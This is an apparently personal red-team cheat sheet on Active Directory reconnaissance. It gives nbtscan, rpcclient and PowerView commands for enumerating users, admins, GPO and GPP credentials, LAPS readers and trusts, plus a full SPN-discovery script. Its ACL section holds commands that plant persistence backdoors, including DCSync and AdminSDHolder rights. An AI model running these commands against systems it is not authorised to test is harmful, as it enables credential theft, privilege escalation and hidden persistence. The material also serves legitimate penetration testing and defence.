**Red Teaming Active Directory**

- [Traditional approach](#traditional-approach)
  - [Recon & Enumeration using sniifers / network scanning tool](#recon--enumeration-using-sniifers--network-scanning-tool)
  - [Using a non-domain joined Linux system](#using-a-non-domain-joined-linux-system)
    - [Discovering Windows hosts](#discovering-windows-hosts)
    - [SNMP](#snmp)
    - [Windows Global Catalog](#windows-global-catalog)
    - [SMB NULL sessions](#smb-null-sessions)
    - [Shares enumeration](#shares-enumeration)
  - [Recon from Domain joined Windows machine](#recon-from-domain-joined-windows-machine)
    - [Getting domain information](#getting-domain-information)
    - [DC Discovery](#dc-discovery)
    - [Enumeration hosts](#enumeration-hosts)
- [Anthenticated Users](#anthenticated-users)
  - [Enumerate shares](#enumerate-shares)
- [Red Team Oriented Recon and Enum](#red-team-oriented-recon-and-enum)
  - [AD Module](#ad-module)
    - [DNS using LDAP](#dns-using-ldap)
    - [SPN Scanning for service discovery](#spn-scanning-for-service-discovery)
    - [Group Policy](#group-policy)
    - [User Hunting](#user-hunting)
    - [Local Administrator Enumeration](#local-administrator-enumeration)
    - [Derivative Local Admin](#derivative-local-admin)
    - [Admin Group Enumeration](#admin-group-enumeration)
    - [Finding Admins: GPO Enumeration & Abuse](#finding-admins-gpo-enumeration--abuse)
    - [Find Admins: GPP](#find-admins-gpp)
    - [Find AD Groups with Local Admin right](#find-ad-groups-with-local-admin-right)
    - [Identify regular users with admin rights](#identify-regular-users-with-admin-rights)
    - [Identify virtual admins](#identify-virtual-admins)
    - [Computers with admin rights](#computers-with-admin-rights)
    - [Get interesting group](#get-interesting-group)
    - [Follow Delegation](#follow-delegation)
    - [MS LAPS Delegation](#ms-laps-delegation)
  - [AD Forest Information](#ad-forest-information)
    - [Trusts](#trusts)
  - [Interesting corners of AD](#interesting-corners-of-ad)
    - [AD ACLs](#ad-acls)
    - [Sensitive Data in user attributes](#sensitive-data-in-user-attributes)
    - [SIDHistory](#sidhistory)
    - [AD User / Computer Properties](#ad-user--computer-properties)
    - [Deleted AD Objects](#deleted-ad-objects)
    - [Domain Password Policies](#domain-password-policies)

---

## Traditional approach

Reference:

- [I Hunt SysAdmins 2.0, Will Schroeder @ harmj0y](https://www.slideshare.net/harmj0y/i-hunt-sys-admins-20)

### Recon & Enumeration using sniifers / network scanning tool

Targeting:

- SNMP community strings
- Hostnames
- Domain names
- ARP traffic

Tools:

- Wireshark
- tcpdump
- nmap

### Using a non-domain joined Linux system

#### Discovering Windows hosts

NetBIOS scanning:

```
nbtscan -r <TARGET_RANGE>
```

Perform reverse DNS lookup to find the hostname:

```
nmap -sL <TARGET/RANGE>
```

`smb_version` from Metasploit to scan for Windows systems. Get **machine name**, **domain name** and **Windows version**.

```
use auxiliary/scanner/smb/smb_version
```

<br/>

#### SNMP

We can also leverage SNMP misconfiguration. Use Metasploit's `snmp_login` for this:

```
use auxiliary/scanner/snmp/snmp_login
```

- Target to sniff for `SNMPv1` or `SNMPv2c`

Once having a SNMP string, enuemrate systems running SNMP:

```
snmpcheck.pl -c <COMMUNITY_STRING> -t <IP_ADDRESS>
```

<br/>

#### Windows Global Catalog

Use `dig` to lookup:

```
dig -t NS <DOMAIN_NAME>
```

```
dig _gc. <DOMAIN_NAME>
```

<br/>

#### SMB NULL sessions

If targets allow NULL sessions, or if you have a valid credentials, we can use `rpcclient` to enuemrate:

```
rpcclient -U <USERNAME> <IPADDRESS>
```

For NULL session:

```
rpcclient -U "" <IPADDRESS>
```

For example, we can script it:

```bash
cat ip_list.txt | while read line; do echo $line && rpcclient -U "<USER>@<PASS>" -c "enumdomusers;quit" $line; done
```

<br/>

More `rpcclient` usage:

- Get info of remote server:

```
srvinfo
```

- Get domain users:

```
enumdomusers
```

- Get domain and built in groups:

```
enumalsgroups domain
```

```
enumlsgroups builtin
```

- Get a SID we can use for a user or group

```
lookupnames <USERNAME / GROUP>
```

- Get details of a user having specific RIDs. (e.g. idenitfy the original admin on a Windows machine):

```
queryuser 500
```

<br/>

#### Shares enumeration

- `enum4linux`
- `smbmap -H <target>`
- `nmap --script smb-enum-shares`

Enumerating shares:

```
smbclient -U "<DOMAIN>\<USER>@<PASS>" -L <HOSTNAME>
```


<br/>

!!! info

    Windows poses numberous obstacle on anonymous users. The `RestrictAnonymous` registry key is one of those.

    There is a bypass (should not work in modern environment) called **Anonymous SID to username translation** - which enables us to perform user enumeration through SID walk.

    - Tool: [dumpusers](https://vidstromlabs.com/freetools/dumpusers/)

<br/>

### Recon from Domain joined Windows machine

#### Getting domain information

```
nslookup -querytype=SRC _LDAP._TCP.DC._MSDCS.<DOMAIN_NAME>
```

#### DC Discovery

Use ADSI (Powershell):

```
[System.DiscoveryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
```

Using `nltest` in CMD:

```
nltest /server:<ANY_IP_OF_DC> /dclist:<DOMAIN_NAME>
```

Using `net view`:

- Return a list of member syustems of domains and workgroups.

```
net view /domain
```

<br/>

#### Enumeration hosts

nslookup script:

```
for /L %i in (1,1,255) do @nslookup 10.10.10.%i <DNS_OR_DC_IP> 2>nul | find "Name" && echo 10.10.10.%i
```

Check remote machine **MAC address**, **hostname**, **domain membership**, **roles (e.g. DC, IIS, MSDB)**.  (This is by NetBIOS over TCP/IP, NetBIOS name tables and name cache):

```
nbtstat -A <REMOTE_HOST_IP>
```

We can script it:

```
for /L %i in (1,1,255) do @nbtstat -A 10.10.10.%i 2>nul && echo 10.10.10.%i
```

<br/>

## Anthenticated Users

Auto scanning tools:

- DumpSec
- shareenum (SysInternal)
- enum.exe

### Enumerate shares

Look for shares with insufficiently secure permissions:

```
net use e: \\<IP>\ipc$ <PASS> /user:<DOMAIN>\<USER>
```

```
net view \\<IP>
```

---

## Red Team Oriented Recon and Enum

- Stealthy recon & enumeration
- Focus on identifying misconfigurations and exploiting trusts with minimum noise

Tools:
- [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
  - Master branch
  - Dev branch
- [AD PowerShell module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps)

!!! note 

    PowerShell activities are quite noisy nowadays. Use C# and .NET to perform operations will be better!

### AD Module

To install:

```
Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell
```

#### DNS using LDAP

```
Get-ADComputer -Filter * -Properties <* | ipv4address> | where {$_.IPV4address} | Select Name, IPV4Address
```

```
Get-ADComputer -Filter { ipv4address -eq '<IP>' } -Properties LastLogonDate, PasswordLastSet, IPV4Address
```

!!! Note
    
    Properties:

    - DistinguishedName
    - DNSHostName
    - Enabled
    - IPv4Address
    - LastLogonDate
    - Name
    - ObjectClass
    - ObjectGUID
    - PasswordLastSet
    - SamAccountName
    - SID

<br/>

#### SPN Scanning for service discovery

- Skip port scanning but use **SPN scanning** to identify enterprise services
- Using LDAP query and look for **Service Principal Name**
  - A service supporting Kerberos should register an SPN (e.g. `MSSQLSvc`, `TERMSERV`, `WSMan`, `exchangeMDB`)

See [ADSecurity - SPN Directory List](https://adsecurity.org/?page_id=183)

We can use the following script:

??? note "Find-PSServiceAccounts"

    ```powershell
    function Find-PSServiceAccounts
    {

    <#
    .SYNOPSIS
    This function discovers all user accounts configured with a ServicePrincipalName in the Active Directory domain or forest.

    Find-PSServiceAccounts
    Author: Sean Metcalf, Twitter: @PyroTek3
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    Last Updated: 1/16/2015
    Version: 1.1

    .DESCRIPTION
    This function discovers all user accounts configured with a ServicePrincipalName in the Active Directory domain or forest.

    Currently, the script performs the following actions:
    * Forest Mode: Queries a Global Catalog in the Active Directory root domain for all user accounts configured with a ServicePrincipalName in the forest by querying the Global Catalog for SPN info.
    * Domain Mode: Queries a DC in the current Active Directory domain for all user accounts configured with a ServicePrincipalName in the forest by querying the DCfor SPN info.
    * Identifies the ServicePrincipalNames associated with the account and reports on the SPN types and server names.
    * Provides password last set date & last logon date for service accounts

    REQUIRES: Active Directory user authentication. Standard user access is fine - admin access is not necessary.

    .EXAMPLE
    Find-PSServiceAccounts
    Perform current AD domain user account SPN discovery via AD and returns the results in a custom PowerShell object.

    .EXAMPLE
    Find-PSServiceAccounts -Forest
    Perform current AD forest user account SPN discovery via AD and returns the results in a custom PowerShell object.

    .EXAMPLE
    Find-PSServiceAccounts -Domain "ad.domain.com"
    Perform user account SPN discovery for the Active Directory domain "ad.domain.com" via AD and returns the results in a custom PowerShell object.

    .EXAMPLE
    Find-PSServiceAccounts -Domain "ad.domain.com" -DumpSPNs
    Perform user account SPN discovery for the Active Directory domain "ad.domain.com" via AD and returns the list of discovered SPN FQDNs (de-duplicated).


    .NOTES
    This function discovers all user accounts configured with a ServicePrincipalName in the Active Directory domain or forest.

    .LINK
    Blog: http://www.ADSecurity.org
    Github repo: https://github.com/PyroTek3/PowerShell-AD-Recon
    #>

    Param
    (
        [ValidateSet("Domain", "Forest")]
        [string]$Scope = "Domain",
        
        [string]$DomainName,
        
        [switch]$DumpSPNs,
        [switch]$GetTGS
        
    )

    Write-Verbose "Get current Active Directory domain... "


    IF ($Scope -eq "Domain")
        {
            IF (!($DomainName))
                { 
                    $ADDomainInfo = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
                    $ADDomainName = $ADDomainInfo.Name
                }
            $ADDomainDN = "DC=" + $ADDomainName -Replace("\.",',DC=')
            $ADDomainLDAPDN = 'LDAP://' + $ADDomainDN
            Write-Output "Discovering service account SPNs in the AD Domain $ADDomainName "
        }

    IF ( ($Scope -eq "Forest") -AND (!($DomainName)) )
        {
            $ADForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
            $ADForestInfoRootDomain = $ADForestInfo.RootDomain
            $ADForestInfoRootDomainDN = "DC=" + $ADForestInfoRootDomain -Replace("\.",',DC=')
            $ADDomainLDAPDN = 'GC://' + $ADForestInfoRootDomainDN
            Write-Output "Discovering service account SPNs in the AD Forest $ADForestInfoRootDomain "
        }

    $root = [ADSI]$ADDomainLDAPDN
    $ADSearcher = new-Object System.DirectoryServices.DirectorySearcher($root,"(&(objectcategory=user)(serviceprincipalname=*))")
    $ADSearcher.PageSize = 5000
    $AllServiceAccounts = $ADSearcher.FindAll()
    # $AllServiceAccountsCount = $AllServiceAccounts.Count
    # Write-Output "Processing $AllServiceAccountsCount service accounts (user accounts) with SPNs discovered in AD ($ADDomainLDAPDN) `r "

    $AllServiceAccountsReport = $Null
    $AllServiceAccountsSPNs = @()
    ForEach ($AllServiceAccountsItem in $AllServiceAccounts)
        {
        $AllServiceAccountsItemSPNTypes = @()
        $AllServiceAccountsItemSPNServerNames = @()
        $AllServiceAccountsItemSPNs = @()
        
            ForEach ($AllServiceAccountsItemSPN in $AllServiceAccountsItem.properties.serviceprincipalname)
                {
                    $AllServiceAccountsItemDomainName = $NULL
                    [array]$AllServiceAccountsItemmDNArray = $AllServiceAccountsItem.Path -Split(",DC=")
                    [int]$DomainNameFECount = 0
                    ForEach ($AllServiceAccountsItemmDNArrayItem in $AllServiceAccountsItemmDNArray)
                        {
                            IF ($DomainNameFECount -gt 0)
                            { [string]$AllServiceAccountsItemDomainName += $AllServiceAccountsItemmDNArrayItem + "." }
                            $DomainNameFECount++
                        }
                    $AllServiceAccountsItemDomainName = $AllServiceAccountsItemDomainName.Substring(0,$AllServiceAccountsItemDomainName.Length-1)

                    $AllServiceAccountsItemSPNArray1 = $AllServiceAccountsItemSPN -Split("/")
                    $AllServiceAccountsItemSPNArray2 = $AllServiceAccountsItemSPNArray1 -Split(":")
                    
                    [string]$AllServiceAccountsItemSPNType = $AllServiceAccountsItemSPNArray1[0]
                    [string]$AllServiceAccountsItemSPNServer = $AllServiceAccountsItemSPNArray2[1]
                    IF ($AllServiceAccountsItemSPNServer -notlike "*$AllServiceAccountsItemDomainName*" )
                        { 
                            $AllServiceAccountsItemSPNServerName = $AllServiceAccountsItemSPNServer 
                            $AllServiceAccountsItemSPNServerFQDN = $NULL 
                        }
                    ELSE
                        {
                            $AllServiceAccountsItemSPNServerName = $AllServiceAccountsItemSPNServer -Replace(("."+ $AllServiceAccountsItemDomainName),"")
                            $AllServiceAccountsItemSPNServerFQDN = $AllServiceAccountsItemSPNServer
                            [array]$AllServiceAccountsSPNs += $AllServiceAccountsItemSPN
                        }
                        
                    #[string]$AllMSSQLSPNsItemServerInstancePort = $ADSISQLServersItemSPNArray2[2]

                    [array]$AllServiceAccountsItemSPNTypes += $AllServiceAccountsItemSPNType
                    [array]$AllServiceAccountsItemSPNServerNames += $AllServiceAccountsItemSPNServerFQDN
                    [array]$AllServiceAccountsItemSPNs += $AllServiceAccountsItemSPN
                    
                }
            
            [array]$AllServiceAccountsItemSPNTypes = $AllServiceAccountsItemSPNTypes | sort-object | get-unique
            [array]$AllServiceAccountsItemSPNServerNames = $AllServiceAccountsItemSPNServerNames | sort-object  | get-unique
            [array]$AllServiceAccountsItemSPNs = $AllServiceAccountsItemSPNs | sort-object  | get-unique
                    
            $AllServiceAccountsItemDN = $Null
            [array]$AllServiceAccountsItemDNArray = ($AllServiceAccountsItem.Properties.distinguishedname) -Split(",DC=")
            [int]$DomainNameFECount = 0
            ForEach ($AllServiceAccountsItemDNArrayItem in $AllServiceAccountsItemDNArray)
                {
                    IF ($DomainNameFECount -gt 0)
                    { [string]$AllServiceAccountsItemDN += $AllServiceAccountsItemDNArrayItem + "." }
                    $DomainNameFECount++
                }
            $AllServiceAccountsItemDN = $AllServiceAccountsItemDN.Substring(0,$AllServiceAccountsItemDN.Length-1)
            
            [string]$ServiceAccountsItemSAMAccountName = $AllServiceAccountsItem.properties.samaccountname
            [string]$ServiceAccountsItemdescription = $AllServiceAccountsItem.properties.description
            [string]$ServiceAccountsItempwdlastset = $AllServiceAccountsItem.properties.pwdlastset
            [string]$ServiceAccountsItemPasswordLastSetDate = [datetime]::FromFileTimeUTC($ServiceAccountsItempwdlastset)
            [string]$ServiceAccountsItemlastlogon = $AllServiceAccountsItem.properties.lastlogon
            [string]$ServiceAccountsItemLastLogonDate = [datetime]::FromFileTimeUTC($ServiceAccountsItemlastlogon)
            
            $ServiceAccountsReport = New-Object PSObject -Property @{            
                Domain                = $AllServiceAccountsItemDomainName                
                UserID                = $ServiceAccountsItemSAMAccountName              
                Description           = $ServiceAccountsItemdescription            
                PasswordLastSet       = $ServiceAccountsItemPasswordLastSetDate            
                LastLogon             = $ServiceAccountsItemLastLogonDate  
                SPNServers            = $AllServiceAccountsItemSPNServerNames
                SPNTypes              = $AllServiceAccountsItemSPNTypes
                ServicePrincipalNames = $AllServiceAccountsItemSPNs
            } 
        
            [array]$AllServiceAccountsReport += $ServiceAccountsReport
        }

    $AllServiceAccountsReport = $AllServiceAccountsReport | Select-Object Domain,UserID,PasswordLastSet,LastLogon,Description,SPNServers,SPNTypes,ServicePrincipalNames

    If ($DumpSPNs -eq $True)
        {
            [array]$AllServiceAccountsSPNs = $AllServiceAccountsSPNs | sort-object | Get-Unique
            return $AllServiceAccountsSPNs
            
            IF ($GetTGS)
                {
                    ForEach ($AllServiceAccountsSPNsItem in $AllServiceAccountsSPNs)
                        {
                            Add-Type -AssemblyName System.IdentityModel
                            New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "$AllServiceAccountsSPNsItem"
                        }
                }
        }

    ELSE
        { return $AllServiceAccountsReport }

    }
    ```

To manually do it:

```
Get-ADComputer -Filter { ServicePrincipalName -Like "*SPN*" } -Properties OperatingSystem, OperatingSystemVersion, OperatingSystemServicePack, PasswordLastSet, LastLogonDate, ServicePrincipalName, TrustedForDelegation, TrustedToAuthForDelegation
```

Reference:

- [ADSecurity - SPN](https://adsecurity.org/?p=230)

<br/>

#### Group Policy

By default, authenticated users can read all group policies in an organization. We can see:

- PS Logging exists?
- Full auditing policy?
- Prevent local account at logon?
- Add server admin to local admin group?
- AppLocker?
- EMET configuration?


```
Get-NetGPO | Select DisplayName, Name, WhenChanged
```

<br/>

#### User Hunting

Gain an understanding of where specific users are logged in.

- Pre-elevated access
- Post-elevated access

<br/>

As an unprivileged user - use **PowerView** `NetWkstaUserEnum` and `NetSessionEnum`.

- `Add-Type` - compile all functionality in memory - but not fileless (not recommended)
- `Pinvoke` - call some compilation artifacts whenever run from the script.
  - Use straight reflection for API interaction through PS to minimize on-disk footprint
  - [PSReflect](https://github.com/mattifestation/PSReflect)
  - Under the hood, `NetSessionEnum` is involved when we use `net session`
  - `net.exe` cannot investigate a remote system
    - But the API call allows us to do this
    - As normal users, ask for all sessions on a remote system like DC / file server
      - Map whereabouts of a large number of logged in users without being spotted
- `-Recurse` option of PowerView - unroll all the nested grou pmemberships and return a neffective set of all thr groups of users having access rights for a particular group

!!! Note

    LDAP queries and ADSI accelerators are how User Hunting works.


<br/>

- Get Domain Admin

```
Get-NetGroupMembero 'Domain Admins' -Recurse
```

- Request for all members of Domain Admins and tokenize every display name
  - Figure out a linkable pattern for admins who have multiple accounts
  - Look for interesting users

```
Get-NetGroupMember -GroupName 'Domain Admins' -FullData | %{ $a=$_.displayName.split(' ')[0..1] -join ' '; Get-NetUser -Filter "(displayName=*$a*)" } | Select-Object -Property displayName, SamAccountName
```

<br/>

If we compromise the identified machine, sit there and wait until the target login with his elevated account - we can compromise the elevated account.

`Invoke-UserHunter` queries the domain for all the computer objects and then using the native API called to enumerate logged on users.

- `Stealth` enuemrates all the distributed file systems and DCs and pulls all user objects, script path(s), home directories etc.
  - Pull certain type of fields that tend to map where file servers are and a user AD schema
  - "Stealth" gets as many computers as it can that are heavily trafficked
  - Getting the list, it do `Get-NetSession` against those systems

```
Invoke-UserHunter -Stealth -ShowAll
```

![picture 3](images/e7c59b2427c96c1737ed1c6537c84b48ddf266696ac15539bc5a264f38f821ba.png)  

<br/>

#### Local Administrator Enumeration

Any domain user can enumerate the members of a localgroup on a remote machine. However we can lock remote calls to SAM with reference to [this](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-clients-allowed-to-make-remote-sam-calls).

- `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\RestrictRemoteSam`


There are 2 ways to enuemrate local admins:

- **WinNT Service Provider**: Use with ADSI accelerators
- **NetLocalGroupGetMembers**: Win32 API call

```powershell
([ADSI]'WinNT://<COMPUTER_NAME>/Administrators').psbase.Invoke('Members') | % { $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null) }
```

```powershell
Get-NetLocalGroup -ComputerName <COMPUTER_NAME>
```

- Get local group membership with the `NetLcoalGroupGetMembers` API call:

```powershell
Get-NetLocalGroup -ComputerName <COMPUTER_NAME> -API
```

- Get the list of effective users who can access a target system

```powershell
Get-NetLocalGroup -ComputerName <COMPUTER_NAME> -Recurse
```

<br/>


#### Derivative Local Admin

- [User Hunting & Derivative Local Admin](https://sixdub.medium.com/derivative-local-admin-cdd09445aac8)

<br/>

#### Admin Group Enumeration

```powershell
Get-NetGroupMember -GroupName "Domain Admins"
```

- Can also use **PowerView** to identify admin accounts indirectly - since admins have to be put into this group so their passwords are not kept on RODCs.

```powershell
Get-NetGroupMember -GroupName "Denied RODC Password Replication Group" -Recurse
```

We can also check the `AdminCount` property to identify potential admins using **PowerView**. (Note: Could have false positives)

```powershell
Get-NetUser -AdminCount | Select Name, WhenCreated, PwdLastSet, LastLogon
```

<br/>

#### Finding Admins: GPO Enumeration & Abuse

GPO policies are by architectural design accessible to anyone on the domain.

Through correlation, we can figure out who can login to a particular machine or anywhere on the domain, talking with the DC only.

- (PowerView) Find accessible computers

```powershell
Find-GPOLocation -UserName <USERNAME>
```

- (PowerView) Identify all computers that the specified user has local RDP access rights to in the domain

```powershell
Find-GPOLocation -UserName <USERNAME> -LocalGroup RDP
```

<br/>

Another route is to:

1. Identify a system has some GPOs applied to it
2. These GPOs have some users linked through restricted groups

For example, the `Desktop Admins` has admin rights on a windows machine. THen to find the user/groups who can administer a given machine through GPO enuemration:

```powershell
Find-GPOComputerAdmin -ComputerName <COMPUTER_NAME>
```


<br/>

#### Find Admins: GPP

- `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`

**PowerSploit**'s `Get-GPPPassword` to identify admin credential in SYSVOL. It scans SYSVOL share on the DC and check the XML files having a `cpassword` attribute. Though encrypted, it can be decrypted using MS published decryption key.

- KB2962486
  - Doesn't delete the existing `cpassword` in SYSVOL


<br/>

#### Find AD Groups with Local Admin right

- Get Groups have admin potential:

```powershell
Get-NetGPOGroup
```

- Enumerate users in the potential admin groups

```powershell
Get-NetGroupMember -GroupName "Local Admin"
```

- Alternatively, target a specific OU, then get a list of GPOs, and get all computers in that OU:

```powershell
Get-NetOU
```

```powershell
Find-GPOComputerAdmin -OUName 'OU=X,OU=Y,DC=Z,DC=W'
```

```powershell
Get-NetComputer -ADSPath 'OU=X,OU=Y,DC=Z,DC=W'
```

<br/>

#### Identify regular users with admin rights

- PowerView

```powershell
Get-netGroup "*admins*" | Get-NetGroupMember -Recurse | ? { Get-NetUser $_.MemberName -filter '(mail=*)' }
```

```powershell
Get-NetGroup "*admins*" | Get-NetGroupMember -Recurse | ? { $_.MemberName -Like '*.*' }
```

<br/>

#### Identify virtual admins

- HyperV admins
- VMWare admins

They usually have full admin access to virtualization platform - own the infrastrcture once compromised.

- PowerView:

```powershell
Get-NetGroup "*Hyper*" | Get-NetGroupMember
```

```powershell
Get-NetGroup "*VMWare*" | Get-NetGroupMember
```

<br/>

#### Computers with admin rights

- PowerView: Find computer accounts with `xxxx$` being in admin groups.

```powershell
Get-NetGroup "*admin*" | Get-NetGroupMember -Recurse | ? { ?_.MemberName -Like '*$' }
```

It is also interesting to enumerate remote desktop users.

```powershell
Get-NetLocalGroup -ComputerName <COMPUTERNAME> -ListGroups
```

```powershell
Get-NetLocalGroup -ComputerName <COMPUTERNAME> -Recurse -List
```

- Check if a user has RDP right

```powershell
Get-netLocalGroup -ComputerName <COMPUTER> -GroupName "Remote Desktop Users" -Recurse
```

<br/>

#### Get interesting group

```powershell
Get-NetDomainController | Get-NetLocalGroup -Recurse
```

<br/>

#### Follow Delegation

Check what delegation has been configured on an OU using **PowerView**:

```powershell
Invoke-ACLScanner -ResovleGUIDs -ADSpath 'OU=X,OU=Y,DC=Z,DC=W' | Where { $_.ActiveDirectoryRights -eq 'GenericAll' }
```

Once get the over-permissive group:

```powershell
Get-NetGroupMember "<Group>"
```

<br/>

#### MS LAPS Delegation

The [LAPS](https://blog.netwrix.com/2021/08/25/running-laps-in-the-race-to-security/) policy can be identified but not interesting.

**PowerView** can pull the permissions for users who has the right to the LAPS password attribute where Cleartext passwords are stored (`ms.Mcs-AdmPwd`).

If we got the user who have LAPS password attribute right, we can pull from AD a list of all the local admins on all the computers, that those users have view access to.

```powershell
Get-NetComputer -ComputerName <COMPUTER> -FullData 
| Select-Object -ExpandProperty distinguishedName 
| ForEach-Object { $_.substring($_.indexof('OU')) } 
| ForEach-Object { Get-ObjectACL -ResovleGUIDs -DistinguishedName $_ } 
| Where-Object { ($_.ObjectType -Like 'ms-Mcs-AdmPwd') and ($_.ActiveDirectoryRights -match 'ReadProperty') } 
| ForEach-Object { Convert-NameToSid $_.IdentityReference }
| Select-Object -ExpandProperty SID
| Get-ADObject
```

Using **PowerView**, we can also get the ACLs for all OUs where someone is allowed to read the LAPS password attribute:

```powershell
Get-NetOU -FullData | Where-Object { ($_.ObjectType -Like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ }
```

<br/>

---

### AD Forest Information

- PowerView - Get forest name and the sites

```powershell
Get-NetForest
```

- Get Domain information (Forest, domain controllers, child domain, domain mode)

```powershell
Get-NetDomain
```

- Check DCs holding the PDC emulatro RSMO role in the forest root domain (PDC is usually the busiest one)

```powershell
Get-ADForest | Select-object -ExpandProperty RootDomain | Get-ADDomain | Select-Object -Property PDCEmulator
```

<br/>

#### Trusts

- Get all domains in the forest

```powershell
Get-NetForestDomain
```

- Get all users in a domain

```powershell
Get-NetUser -Domain <domain>
```

- Get all admin groups across a trust

```powershell
Get-NetGroup *admin* -Domain <domain>
```

- Mapping trusts

```powershell
Invoke-MapDomainTrust
```

```powershell
Invoke-MapDomainTrust -LDAP
```

- Export domain trusts mapping for visualization

```powershell
Invoke-MapDomainTrust | Export-CSV -NoTypeInformation trusts.csv
```

- Find users in the current domain that reside in groups across a trust

```powershell
Find-ForeignUser
```

- Find groups in a remote domain that include users not in the target domain

```powershell
Find-ForeignGroup -Domain <DOMAIN>
```

<br/>

- PowerView: Get trust related information

```powershell
Get-NetDomainTrust
```

<br/>

---

### Interesting corners of AD

#### AD ACLs

- Not commonly audited for misconfigrations
- Sneaky persistence

Typical abusive permission:

- WRITE permission over a GPO

Get check the ACLs for a given user:

```powershell
Get-ObjectACL -ResolveGUIDs -SamAccountName <SamAccountName>
```

<br/>

To add a backdoor ACL - Grant `SAMAccountName1` right to reset password for `SamAccountName2`:

```powershell
Add-ObjectACL -TargetSamAccountName SamAccountName2 -PrincipalSamAccountName SAMAccountName1 -Rights ResetPassword
```

<br/>

For AdminSDHolder:

```powershell
Add-ObjectACL -TargetADSprefix 'CN=AdminSDHolders,CN=System' -PrincipalSamAccountName <SAMAccountName1> -Verbose -Rights All
```

Check who have AdminSDHodlers:

```
Get-ObjectACL -ADSprefix 'CN=AdminSDHolders,CN=System' -ResolveGUIDs | ?{ $_.IdentityReference -match '<SamAccountname>' }
```

<br/>

For DCSync:

```powershell
Add-ObjectACL -TargetDistinguishedName "dc=x,dc=y" -PrincipalSamAccountName <SAMAccountName> -Rights DCSync
```

Check who has DCSync rights:

```powershell
Get-ObjectACL -DistinguishedName "dc=x,dc=y" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
```

<br/>

Check GPO permissions:

```powershell
Get-NetGPO | ForEach-Object { Get-objectACL -ResolveGUIDs -name $_.name } | Where-Object { $_.ActiveDirectoryRights -match 'WriteProperty' }
```

<br/>

Scan for non-standard ACL:

```powershell
Invoke-ACLScanner
```

<br/>

#### Sensitive Data in user attributes

```powershell
Get-ADUser <USERNAME> -Properties * | Select Description
```

- Remember if `AdminCount = 1`, likely the user account is a memebr of Domain Admins or other privilege group

```powershell
Get-NetUser -AdminCount
```

<br/>

#### SIDHistory

The `SIDHistory` attribute can contain SID from another user and provide the same level access as that user

```powershell
Get-NetUser -SPN
```

<br/>

#### AD User / Computer Properties

```
Get-ADComputer -Filter * -Property property
```

- (**PowerView**) Get MSSQL server leveraging SPN

```
Get-NetComputer -SPN mssql*
```

<br/>

If `PasswordLastSet` hasn't been updated for quite a long time - that computer may not be on the network.

If `LastLogonData` is long - possibly missing patches.

<br/>

Through the `ServicePrincipalName`, we can get the information about the Kerberos enterprise services on these computers. The `TrustForDelegation` and `TrustedToAuthForDelegation` provide useful information.

```powershell
Get-ADComputer -Filter { PrimaryGroupID -eq "515" } -Properties OperatingSystem, OperatingSystemVersion, OperatingSystemServicePack, PasswordLastSet, LastLogonDate, ServicePrincipalName, TrustedForDelegation, TrustedToAuthForDelegation
```

<br/>

#### Deleted AD Objects

- Not actually deleted - just hidden!
- Search by `isdeleted` flag
- Require local admin privilege

- Retrieve the deleted AD objects

```
Import-Module .\DisplayDeletedADObjects.psm1
Get-OSCDeletedADObjects
```

<br/>

#### Domain Password Policies

AD PowerShell module:


```powershell
Get-ADDefaultDomainPasswordPolicy
```

